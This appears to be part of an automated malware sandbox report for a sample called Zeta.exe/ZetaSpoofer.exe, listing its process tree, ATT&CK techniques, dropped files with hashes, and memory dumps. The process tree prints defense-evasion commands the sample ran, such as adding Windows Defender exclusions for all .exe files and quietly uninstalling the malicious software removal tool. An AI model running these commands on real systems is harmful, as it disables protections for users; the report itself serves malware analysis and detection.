  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3460
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3392
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2244
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3992
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3376
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3340

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1548

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Zeta.exe

Filesize
11.3MB

MD5
f79df4f96e90110491b16131ad54f231

SHA1
307be8cf98adb6c2f359ffa67c8e9476febadd5a

SHA256
817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a

SHA512
ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe

Filesize
5.3MB

MD5
7bda2ed86f648c8528531d76f0a53f2a

SHA1
5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

SHA256
667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

SHA512
075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\PIL\_imaging.cp39-win32.pyd

Filesize
2.0MB

MD5
9a1cbac8ca3860e21db2c1fb297b5b76

SHA1
97910a40ba50718ac31e8b85f701a0ac727e199e

SHA256
4c95efcb42780f849ee500f62c5eb8b5a54fea5b6df3371cd023459e9740b9e1

SHA512
6b779d578f57b0acffceb5b14cb21d24673e40378201943a5de62e3205d644e7b764da1798938f8f31ef5e9ee5d04eba695792f266b326d6e476e0cd9f57c9db

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\VCRUNTIME140.dll

Filesize
81KB

MD5
55c8e69dab59e56951d31350d7a94011

SHA1
b6af2d245ae4d67c38eb1cd31e0c1cffb29b9b2c

SHA256
9d8d21022ff9d3f6b81a45209662a4f3481edc2befae0c73b83cf942eab8be25

SHA512
efb2ac1891724df16268480628eb230b6ee37ed47b56d2e02a260559865cdd48ee340ce445e58f625e0f4d6dbdc5bfb7ce2eeedf564b837cff255ef7d1dc58cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_asyncio.pyd

Filesize
56KB

MD5
87ec92f3a05fe07a087d5137d218386f

SHA1
840b88107ac72c5752c6db422a54fa3459f5a3b6

SHA256
c60416af400ee4a75b957de9c19f1e50af7287c89bbe0b3d6a3f0c0829daaf4a

SHA512
a0c1501bd19759ffd471edc5b92f48a7d3b69ec9e257e03f74f5ce574776c6d927c58a1f6460455ed096c0e538a673528a16723dfda6303fe831e2ca672bb1ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_bz2.pyd

Filesize
75KB

MD5
387725bc6de235719ae355dfaa81e67c

SHA1
428b74b0bf8acd04eb20dc5a016352042c812c7a

SHA256
a9de8848c95518434cb5c2a9cb9d648cba140021e49f2e5212becf13a329b5d0

SHA512
bed2d6902f2ddd7dc7c2043c210ce682df75616ca63d163b756559dc7d33e926733f96d5407dc856061fba711ce41de9b01bb7b9db3940fa359c32c40d9f8233

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_ctypes.pyd

Filesize
112KB

MD5
aff88d04f5d45e739902084fce6da88a

SHA1
6ce6a89611069deaa7c74fa4fa86882dc21b5801

SHA256
34371eb9b24ba67ce6803d965cf5f0fe88ef4762af648ec2183e5bf21835d876

SHA512
8dd8f90ae1cc0fbc76f0039bc12e1aee7b2718017f4f9b09361001bed7b278b84f20d0fffceda4d5edd8744140cfdf1ca52497645d0480f5d42934f7df9808ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_decimal.pyd

Filesize
224KB

MD5
680d0a29b8ad9cdb2ddd8d6b59e2fecd

SHA1
8ec37f37622d29d3025bc6007dfb11ff3ec31a07

SHA256
21034f441ffdea24ad10dbbce5ba440c2135bb809695dfbeb2d860325135bc61

SHA512
f2a96fb98f2c4ec544b3bc0d289139ecc08b8e53140380d8cfda335d367f6465a7557161a8ca18944d11b2b1fd3a1d1eaaa27ed8c003b0b0b57c5c960846b47b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_elementtree.pyd

Filesize
172KB

MD5
3a30ba2fa5d1ef52ad50ebb875110b72

SHA1
96501e242e94907be5b70c61ef13017f22f9df18

SHA256
e45209f2a035c64d3a6fed019241983704e021bab32abd068a7954eedd640101

SHA512
a340d58c96e46cf539d9732fbb3b0cbd82965176c4bd27b33adcb1d50e25cafe23d56bde4fda2f0287510f21e4f12257534ef395780fa38bc4c55aa808893728

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_hashlib.pyd

Filesize
50KB

MD5
fdfa235f58a04d19e1ce923ca0d8ae19

SHA1
4a1178ba7e9a56f8c68dc3391a169222c67237e9

SHA256
7ad484e99ea33e4eea2cbf09203fb9dbd0c2c325b96e6cf2ffd146156c93bf7a

SHA512
0fe187e1019c159c0ee90fbc8eea20e40a28ff05223321d04784e577b60a2c0a3a476fabc71bd81dd08e7a127bb6cb03edf5d604bfdda38516fb2c90148dd118

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_lzma.pyd

Filesize
157KB

MD5
f6b74ac19fb0601a4e612a8dc0c916e3

SHA1
d4a77386caf7f70e66d5ec4543c8d9de0e4bc39f

SHA256
ce2ea2c96afd8c0cf97fc55130f835b6625a0772d86b259ea82bbc0b3def75e6

SHA512
0b60c51f76eb6872000d92bbec7fdabf687f5096fd12f1456cf26ad6033c22b998aee94842fda800288bef94790608204f97a7ed034544a1377cbf9722c6a826

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_multiprocessing.pyd

Filesize
25KB

MD5
d165a01fe4f19ba9cb74b9aff5c79d80

SHA1
f78083226d6b37c7c3ecca55a0ab8f2227b5f6ef

SHA256
f87547427b693640e45b8fc51a2efbaca75e6f915e5516f8ea81ebe010e0f89d

SHA512
efa96cee1721ba2f374d31766d720f8bccd34fdec206849cb9ddcf1b149f0a6068ef23aecfa8e2a092d08f3b7db46c0e3e1cf2d891a999265110404f934ce226

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_overlapped.pyd

Filesize
37KB

MD5
6ad0656b55a9a4d0544d295b8b54a5e5

SHA1
5b0ba4d95bb325aef33971ebceee0d86fee80df0

SHA256
dcf4ebaacf2fa99d9310bf21e1f18eb7fb6f4d02f7731b3542403ecab9748ac6

SHA512
86ad66151556a9ff882befb8c2fd2e51e846078b3e3b34b1e7bf5e5e43f74bee62e111b0c79f6a0580dc6e27b37d7f26aec91bc6240687e7fd8a70b9601f8b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_queue.pyd

Filesize
24KB

MD5
9cddd43f5b53ab8993e46b24b68d8424

SHA1
7327ed8baf41f86d122137c511656f98d99ff990

SHA256
fa262ab8fb1caf23abf125e1b9d69c78727be3d8274e13ebe83e71f1058406d3

SHA512
9661968a986af5495bb3632e0a658885933ed733d64785627597456a5cef9521359a078f64af78464675698aff8f4b3cf844a56a8adbe4d69d4abe8fba3ca542

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_socket.pyd

Filesize
68KB

MD5
a9450642d8832893998bd213d98d509b

SHA1
3ef416ffaa438a2809cdffddd1b2717461ead7d4

SHA256
5407750d69d74318ec66bd1464558c07c06c6aa9edbc0641cd2dd7533378772b

SHA512
93027a694800d2d92ba773e8232ee016946ee9b36ba211537619df0508e9f50660b9a292d29dd4e90c2406b29bd3b1f8e4eb2226945b7163b2bd3227d4482323

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_ssl.pyd

Filesize
138KB

MD5
620f8f46eed249f7a7881656ad22062d

SHA1
709c772808ff2e894cdf1066c28287e92fc643c5

SHA256
dbceda1c97bfc8f6a0d1d17df6a2d7e1d44c59718cd652e0a5975052b218c590

SHA512
2bc2674603db7e29005b84b5de9cefa98737ebbdab5f5a034856c26099872e6886c8b6a41f2cdb2bb52a84ae1a15ae21b6394e1fe6820ba4fe0c7d88f3b1511a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\auto.tcl

Filesize
20KB

MD5
5e9b3e874f8fbeaadef3a004a1b291b5

SHA1
b356286005efb4a3a46a1fdd53e4fcdc406569d0

SHA256
f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840

SHA512
482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\encoding\cp1252.enc

Filesize
1KB

MD5
5900f51fd8b5ff75e65594eb7dd50533

SHA1
2e21300e0bc8a847d0423671b08d3c65761ee172

SHA256
14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0

SHA512
ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\init.tcl

Filesize
23KB

MD5
b900811a252be90c693e5e7ae365869d

SHA1
345752c46f7e8e67dadef7f6fd514bed4b708fc5

SHA256
bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a

SHA512
36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\package.tcl

Filesize
22KB

MD5
55e2db5dcf8d49f8cd5b7d64fea640c7

SHA1
8fdc28822b0cc08fa3569a14a8c96edca03bfbbd

SHA256
47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad

SHA512
824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\tclIndex

Filesize
5KB

MD5
e127196e9174b429cc09c040158f6aab

SHA1
ff850f5d1bd8efc1a8cb765fe8221330f0c6c699

SHA256
abf7d9d1e86de931096c21820bfa4fd70db1f55005d2db4aa674d86200867806

SHA512
c4b98ebc65e25df41e6b9a93e16e608cf309fa0ae712578ee4974d84f7f33bcf2a6ed7626e88a343350e13da0c5c1a88e24a87fcbd44f7da5983bb3ef036a162

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tcl_data\tm.tcl

Filesize
11KB

MD5
f9ed2096eea0f998c6701db8309f95a6

SHA1
bcdb4f7e3db3e2d78d25ed4e9231297465b45db8

SHA256
6437bd7040206d3f2db734fa482b6e79c68bcc950fba80c544c7f390ba158f9b

SHA512
e4fb8f28dc72ea913f79cedf5776788a0310608236d6607adc441e7f3036d589fd2b31c446c187ef5827fd37dcaa26d9e94d802513e3bf3300e94dd939695b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tk_data\pkgIndex.tcl

Filesize
363B

MD5
a6448af2c8fafc9a4f42eaca6bf6ab2e

SHA1
0b295b46b6df906e89f40a907022068bc6219302

SHA256
cd44ee7f76c37c0c522bd0cfca41c38cdeddc74392b2191a3af1a63d9d18888e

SHA512
5b1a8ca5b09b7281de55460d21d5195c4ee086bebdc35fa561001181490669ffc67d261f99eaa900467fe97e980eb733c5ffbf9d8c541ede18992bf4a435c749

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tk_data\tk.tcl

Filesize
22KB

MD5
3250ec5b2efe5bbe4d3ec271f94e5359

SHA1
6a0fe910041c8df4f3cdc19871813792e8cc4e4c

SHA256
e1067a0668debb2d8e8ec3b7bc1aec3723627649832b20333f9369f28e4dfdbf

SHA512
f8e403f3d59d44333bce2aa7917e6d8115bec0fe5ae9a1306f215018b05056467643b7aa228154ddced176072bc903dfb556cb2638f5c55c1285c376079e8fe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_tkinter.pyd

Filesize
58KB

MD5
a475634789bb1284d75e55870462a74a

SHA1
af7bfe3ffeef7479549831c5cd0de487151a6c5f

SHA256
725a13950969db01ad20af1f36eb28d6011a2feb31bd8c112b6bed2d025bc761

SHA512
9ca2f331d9ca22732ab0cf12a42d1b221f5daf01b5a83c43a4ba0b48798289d52428ab17cdedfde9eb2daf5f12304fe28e2c4d2306399b7fa562acdc74487a19

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\_uuid.pyd

Filesize
19KB

MD5
8f3020f3fc4ab65c2cf9191f38749d26

SHA1
61838e10f152fa7d1632fddf7646de4c669e9036

SHA256
f12a7102bcbb9ca5f57d13474f8da916ad42a9a4d8c8b22be24ee3b6916f54e3

SHA512
8113095d7e344bb163a7759e059db97671636a57fe008d2eb64aded4fe3d7c44403941ac36a520c17bf8cd9a8aab8d8324e138014249b23fad03b10140d7b8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\base_library.zip

Filesize
822KB

MD5
402e295023318da79efcecb016b4bab8

SHA1
ed63aa096e4eff41e511a368dc5f167745f3530d

SHA256
848716e915976e3c898011a01e7167bf3dc7ab52eea7731fb05c8f6b5a6e413e

SHA512
e1a284b97bbe1f60bc9a89fff76599484ebfa9b65879ed47f82062782aa03092c14fabda6f8af592818d36d22bc0f422db4b62565ee92d87df9b5d34b9e8cbc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\btc_logo.png

Filesize
47KB

MD5
928a7f15372cc4fb1b2c154ec6603e5d

SHA1
4e1a0db1a13f10510a7d017bd5deef1156a6d0ea

SHA256
45b633f82ba0eee91b529c5c0a2f3a92c277cac920aa8470b95d594d661c1d8f

SHA512
2e35d2a95fe06f814101278474fcdc9c0d967e83a45fe954c064e901eb7cd89acd85ce3b4c7fdeb4423054187d7e01c895a49df888547ecb9d8232591d5ec901

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\customtkinter\assets\themes\blue.json

Filesize
4KB

MD5
05eb3947ce9a8c3bef66c14d0f938671

SHA1
06ffc811ee51609809d88894022e222b339aefee

SHA256
c9417470c16ced7a43d6c4a8e027afa6edc62c24d5aee7c4c2dcd11385964d3b

SHA512
4db7c14fba78185edf6459016608cb8fa0a250dfb48432c552bb4e0466cf49622b34d847e17c254bb1c8d15bf365e91bce3ede552ba8733fde9d21779f7f1c13

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\eth_logo.png

Filesize
156KB

MD5
86b356aa4636232f3e200c65d2a8b6b4

SHA1
3f415cd75e8a755a032ae16a3406c41dcc2d667a

SHA256
7af0cf14f1d0a35e2446b1ad8db4fc424c6735c4ca2ded1410f8d3ad69456913

SHA512
a2e8a2b8039b0a0f3fbd8d4a89554b313f7cab24530426eafc2d9a1b63e5c126fb419b61826894a2cc5f42f2c298151cec05d0e73aae55f419da60ad02b45a38

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\libcrypto-1_1.dll

Filesize
2.1MB

MD5
aad424a6a0ae6d6e7d4c50a1d96a17fc

SHA1
4336017ae32a48315afe1b10ff14d6159c7923bc

SHA256
3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377

SHA512
aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\libssl-1_1.dll

Filesize
525KB

MD5
697766aba55f44bbd896cbd091a72b55

SHA1
d36492be46ea63ce784e4c1b0103ba21214a76fb

SHA256
44a228b3646eb3575abd5cbcb079e018de11ca6b838a29e4391893de69e0cf4b

SHA512
206957347540f1356d805bf4a2d062927e190481aadc105c3012e69623149850a846503fca30fc38298f74d7f8f69761fddd0aa7f5e31fedb1fa5e5c9de56e9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\pyexpat.pyd

Filesize
164KB

MD5
3e43bcc2897f193512990e9e9024111b

SHA1
11dec8c9a1c4b45de9c980125eaef462038c1f2a

SHA256
0d8ac2a2b81176a06b0fb8663702428d2cdd5bedeab68b04210bf5cb6b49a475

SHA512
e629f23a9ad1274b57a47b170e598e47f28984dc2aaf4985ded9b217f4288222190eabe5a9fd4b11fa3eadb42040d8a532090544bf46be288b7310966d126aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\python39.dll

Filesize
4.2MB

MD5
2a9c5db70c6906571f2ca3a07521baa2

SHA1
765fa27bbee6a02b20b14b2b78c92a880e6627e5

SHA256
c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

SHA512
fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\select.pyd

Filesize
23KB

MD5
1559cf3605d62c03d6ff2440ea3e175f

SHA1
26faec2bafd8523d1705021d06c56947b58cda1c

SHA256
b8da64fa424e5fb2bc8de93d2c0dcb55076cd9345452d3c624b3fcbbbe15644b

SHA512
1891a356ae98a09a7476697b6e7dd0de6b940043910a9aa414e17a523118d76dd0c55ea786d9bd2a77d792bdf95a75b272352eb813d928c429a707a78c09f05c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

Filesize
1KB

MD5
4ce7501f6608f6ce4011d627979e1ae4

SHA1
78363672264d9cd3f72d5c1d3665e1657b1a5071

SHA256
37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b

SHA512
a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\tcl86t.dll

Filesize
1.3MB

MD5
30195aa599dd12ac2567de0815ade5e6

SHA1
aa2597d43c64554156ae7cdb362c284ec19668a7

SHA256
e79443e9413ba9a4442ca7db8ee91a920e61ac2fb55be10a6ab9a9c81f646dbb

SHA512
2373b31d15b39ba950c5dea4505c3eaa2952363d3a9bd7ae84e5ea38245320be8f862dba9e9ad32f6b5a1436b353b3fb07e684b7695724a01b30f5ac7ba56e99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\tcl8\8.5\msgcat-1.6.1.tm

Filesize
33KB

MD5
db52847c625ea3290f81238595a915cd

SHA1
45a4ed9b74965e399430290bcdcd64aca5d29159

SHA256
4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55

SHA512
5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\tk86t.dll

Filesize
1.1MB

MD5
6cadec733f5be72697d7112860a0905b

SHA1
6a6beeef3b1bb7c85c63f4a3410e673fce73f50d

SHA256
19f70dc79994e46d3e1ef6be352f5933866de5736d761faa8839204136916b3f

SHA512
e6b3e52968c79d4bd700652c1f2ebd0366b492fcda4e05fc8b198791d1169b20f89b85ec69cefa7e099d06a78bf77ff9c3274905667f0c94071f47bafad46d79

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\unicodedata.pyd

Filesize
1.1MB

MD5
bd51c8fbb9bfc437e19cb19042bfeae8

SHA1
8e537acb5a5f421ae4290681ed7d295ac8e86ca2

SHA256
1ccf9fa395e963daf8aba5a2acd68c5b13ee04b6b689a601652bcf04e7f25f8a

SHA512
6dd7041ee42dc2f67eef5efb0eb519dfc79cb19293693d9fb6e60e4cff374e3f955f7e09c8d9526fb5e1a3014875bd09a712d397a7068ac0900c6f8b754d8e6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49122\zeta_icon.png

Filesize
101KB

MD5
37c8bfddeff3b0c74eed7eca94d4bb7b

SHA1
6ecee7d47c7e5a350581a193a72f73ccfbdc8c6a

SHA256
ee5c971c5e6d374de4c78e2b1e975651a95af2ea2e7687afa75ca58eea3e47c5

SHA512
12f0a8b24d5d5d9daed81eea349093ee2be1e2e6043351015b49820ea6c84765c251eaa4f24efa479a0081f3c1cd59989d94281f1836acec0b11ee4997cd0b0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdlpcsx4.43p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/612-1157-0x000001A8EEE60000-0x000001A8EEE85000-memory.dmp

Filesize
148KB

Download
memory/612-1166-0x00007FFB1F410000-0x00007FFB1F420000-memory.dmp

Filesize
64KB

Download
memory/612-1165-0x000001A8EEE90000-0x000001A8EEEBB000-memory.dmp

Filesize
172KB

Download
memory/612-1159-0x000001A8EEE90000-0x000001A8EEEBB000-memory.dmp

Filesize
172KB

Download
memory/612-1158-0x000001A8EEE90000-0x000001A8EEEBB000-memory.dmp

Filesize
172KB

Download
memory/668-1170-0x0000020699BC0000-0x0000020699BEB000-memory.dmp

Filesize
172KB

Download
memory/2104-1146-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1153-0x00007FFB5D460000-0x00007FFB5D51E000-memory.dmp

Filesize
760KB

Download
memory/2104-1154-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1147-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1148-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1149-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1151-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2104-1152-0x00007FFB5F390000-0x00007FFB5F585000-memory.dmp

Filesize
2.0MB

Download
memory/2900-1145-0x00007FFB5D460000-0x00007FFB5D51E000-memory.dmp

Filesize
760KB

Download
memory/2900-1114-0x00007FFB5F390000-0x00007FFB5F585000-memory.dmp

Filesize
2.0MB

Download
memory/2900-1113-0x0000020B74250000-0x0000020B7427A000-memory.dmp

Filesize
168KB

Download
memory/3164-91-0x00007FFB40DE0000-0x00007FFB41781000-memory.dmp

Filesize
9.6MB

Download
memory/3164-3-0x00007FFB40DE0000-0x00007FFB41781000-memory.dmp

Filesize
9.6MB

Download
memory/3164-1-0x00007FFB40DE0000-0x00007FFB41781000-memory.dmp

Filesize
9.6MB

Download
memory/3164-0-0x00007FFB41095000-0x00007FFB41096000-memory.dmp

Filesize
4KB

Download
memory/3340-1137-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1135-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1132-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1138-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1141-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1134-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1133-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1136-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1140-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1139-0x00000220AF710000-0x00000220AF730000-memory.dmp

Filesize
128KB

Download
memory/3340-1142-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1144-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3340-1143-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3376-1127-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3376-1126-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3376-1131-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3376-1123-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3376-1125-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3376-1124-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3888-1070-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/3888-1071-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/3888-1073-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/3888-1075-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/3888-1072-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4452-1066-0x0000017AFD460000-0x0000017AFD482000-memory.dmp

Filesize
136KB

Download
memory/4784-1108-0x000001DBB64F0000-0x000001DBB64FA000-memory.dmp

Filesize
40KB

Download
memory/4784-1105-0x000001DBB62E0000-0x000001DBB6395000-memory.dmp

Filesize
724KB

Download
memory/4784-1104-0x000001DBB62C0000-0x000001DBB62DC000-memory.dmp

Filesize
112KB

Download
memory/4784-1112-0x000001DBB6540000-0x000001DBB654A000-memory.dmp

Filesize
40KB

Download
memory/4784-1106-0x000001DBB63A0000-0x000001DBB63AA000-memory.dmp

Filesize
40KB

Download
memory/4784-1107-0x000001DBB6510000-0x000001DBB652C000-memory.dmp

Filesize
112KB

Download
memory/4784-1111-0x000001DBB6530000-0x000001DBB6536000-memory.dmp

Filesize
24KB

Download
memory/4784-1109-0x000001DBB6550000-0x000001DBB656A000-memory.dmp

